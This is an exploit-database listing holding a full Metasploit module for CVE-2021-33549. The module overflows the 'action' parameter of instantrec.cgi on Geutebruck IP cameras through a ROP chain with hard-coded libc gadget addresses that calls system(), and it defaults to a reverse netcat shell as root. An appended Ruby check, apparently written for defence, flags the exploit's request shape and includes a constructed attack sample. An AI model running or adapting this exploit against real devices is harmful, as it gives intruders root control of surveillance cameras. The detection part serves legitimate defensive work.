0day.today - Biggest Exploit Database in the World.
Geutebruck instantrec Remote Command Execution Exploit
Security Risk: Critical
CVE: CVE-2021-33549
Authors: Titouan Lazard (discovery) and Ibrahim Ayadhi (Metasploit module), RandoriSec
Platform: Linux / Unix, ARM little-endian (ARMLE)
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Geutebruck instantrec Remote Command Execution',
        'Description' => %q{
          This module exploits a buffer overflow within the 'action' parameter
          of the /uapi-cgi/instantrec.cgi page of Geutebruck G-Cam EEC-2xxx and
          G-Code EBC-21xx, EFD-22xx, ETHC-22xx, and EWPC-22xx devices running
          firmware versions <= 1.12.0.27 as well as firmware versions 1.12.13.2
          and 1.12.14.5. Successful exploitation results in remote code
          execution as the root user.
        },
        'Author' => [
          'Titouan Lazard - RandoriSec', # Discovery
          'Ibrahim Ayadhi - RandoriSec' # Metasploit Module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2021-33549'],
          ['URL', 'https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/'],
          ['URL', 'http://geutebruck.com'],
          ['URL', 'https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03']
        ],
        'DisclosureDate' => '2021-07-08',
        'Privileged' => true,
        'Platform' => %w[unix linux],
        'Arch' => [ARCH_ARMLE],
        'Targets' => [
          ['Automatic Target', {}]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
        },
        'Notes' => {
          'Stability' => ['CRASH_SAFE'],
          'Reliability' => ['REPEATABLE_SESSION'],
          'SideEffects' => ['ARTIFACTS_ON_DISK']
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The path to the instantrec page', '/uapi-cgi/instantrec.cgi'])
      ]
    )
  end

  # Builds the ROP chain that replaces the saved return address. The chain
  # copies the command string, four bytes at a time, into a writable word in
  # libc's .data and then returns into system() with r0 pointing at it.
  def write_payload
    # gadgets (offsets into libc; the base is hard-coded, so the chain assumes
    # libc is mapped at this fixed address on the affected firmware)
    libc_add = 0x402da000
    system_off = 0x00357fc
    libc_data_off = 0x12c960
    str_r1_off = 0x0006781c # str r1, [r4, #0x14]; pop {r4, pc}
    pop_r0_off = 0x00101de4 # pop {r0, pc}
    pop_r1_off = 0x0010252c # pop {r1, pc}
    pop_r4_off = 0x00015164 # pop {r4, pc}

    system_ = libc_add + system_off
    str_r1 = libc_add + str_r1_off
    pop_r0 = libc_add + pop_r0_off
    pop_r1 = libc_add + pop_r1_off
    pop_r4 = libc_add + pop_r4_off
    add_str = libc_data_off + libc_add + 4 # where the command string is assembled

    # pad the command to a multiple of 4 bytes and split it into 32-bit words
    chunks = (payload.raw + ' ' * (4 - payload.raw.length % 4)).unpack('I<*')

    rop = []
    rop += [pop_r4]
    rop += [add_str - 0x14] # r4 + 0x14 == add_str for the first store
    chunks.each_with_index do |chunk, index|
      rop += [pop_r1]
      rop += [chunk]
      rop += [str_r1] # store the word at r4 + 0x14, then pop the next r4
      rop += if index != (chunks.length - 1)
               [add_str - 0x14 + ((index + 1) * 4)] # advance the write pointer one word
             else
               [0x41414141] # after the last store r4 is no longer used
             end
    end
    rop += [pop_r0]
    rop += [add_str] # r0 = pointer to the assembled command
    rop += [system_]

    rop.pack('V*')
  end

  def exploit
    print_status("#{rhost}:#{rport} - Attempting to exploit...")

    # 536 bytes of padding reach the saved return address; the chain follows
    pad_size = 536
    data = Rex::Text.pattern_create(pad_size) + write_payload

    send_request_cgi(
      'method' => 'POST',
      # a random leading directory followed by '../' still resolves to the CGI
      'uri' => normalize_uri('/', Rex::Text.rand_hostname, '../', target_uri.path),
      'vars_post' => {
        'action' => data
      }
    )

    handler
  end
end

# 0day.today [2024-11-14] #
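The request the module sends has a recognisable shape: a random directory plus '../' in front of the CGI path, a POST whose action value is at least the 536 bytes of padding, and packed 32-bit addresses that are not printable text. As an added example (not from the module, RandoriSec or any vendor advisory), the Ruby check below flags exactly those traits on raw HTTP requests, for use in a WAF rule test or when replaying captured traffic. The request samples are constructed; the benign action=start value is a placeholder rather than a documented instantrec parameter value, and the 536-byte threshold is the module's own padding, so a variant with a different offset would need a lower bound.

```ruby
# Added example: request-level check for the instantrec exploit shape.
# Not part of the module; sample requests are constructed.
require 'cgi'

TARGET_CGI = '/uapi-cgi/instantrec.cgi'
PAD_SIZE   = 536 # the module's padding before the ROP chain (assumed lower bound)

# Resolve '.' and '..' segments the way a web server would, so
# '/x/../uapi-cgi/instantrec.cgi' and '/uapi-cgi/instantrec.cgi' compare equal.
def normalize_path(path)
  out = []
  path.split('/').each do |seg|
    case seg
    when '', '.' then next
    when '..' then out.pop
    else out << seg
    end
  end
  '/' + out.join('/')
end

# Split a raw HTTP/1.1 request into method, request-target and body.
def parse_request(raw)
  head, body = raw.split("\r\n\r\n", 2)
  method, target = head.lines.first.split
  { method: method, target: target, body: body.to_s }
end

# Returns the reasons a request looks like the instantrec exploit; empty when
# nothing matches. Only requests that resolve to the CGI are examined.
def suspicious_reasons(raw)
  req = parse_request(raw)
  path = req[:target].split('?', 2).first
  reasons = []
  return reasons unless normalize_path(path) == TARGET_CGI

  reasons << 'path traversal used to reach /uapi-cgi' if path.split('/').include?('..')
  return reasons unless req[:method] == 'POST'

  # .b forces a byte string so length and byte checks ignore charset guesses
  action = Array(CGI.parse(req[:body])['action']).first.to_s.b
  if action.bytesize >= PAD_SIZE
    reasons << "action parameter is #{action.bytesize} bytes (>= #{PAD_SIZE})"
  end
  if action.bytes.any? { |b| b < 0x20 || b > 0x7e }
    reasons << 'action parameter carries non-printable bytes (packed addresses)'
  end
  reasons
end

# Constructed samples. The benign value is a placeholder, not a documented
# instantrec action. The second mirrors the module: random directory + '../',
# 536 bytes of padding, then one packed little-endian libc address.
BENIGN_REQUEST = "POST /uapi-cgi/instantrec.cgi HTTP/1.1\r\nHost: cam\r\n\r\naction=start"
EXPLOIT_REQUEST = "POST /qzkt.cam/../uapi-cgi/instantrec.cgi HTTP/1.1\r\nHost: cam\r\n\r\n" \
                  'action=' + CGI.escape('A' * PAD_SIZE + [0x402dd7fc].pack('V'))

if $PROGRAM_NAME == __FILE__
  [BENIGN_REQUEST, EXPLOIT_REQUEST].each do |raw|
    reasons = suspicious_reasons(raw)
    puts "#{raw.lines.first.strip}: #{reasons.empty? ? 'clean' : reasons.join('; ')}"
  end
end
```

An access log alone only shows the first trait (the '/../' in the request line), so the length and byte checks need the POST body, which means running the check in a reverse proxy, WAF or on captured packets rather than on web-server logs.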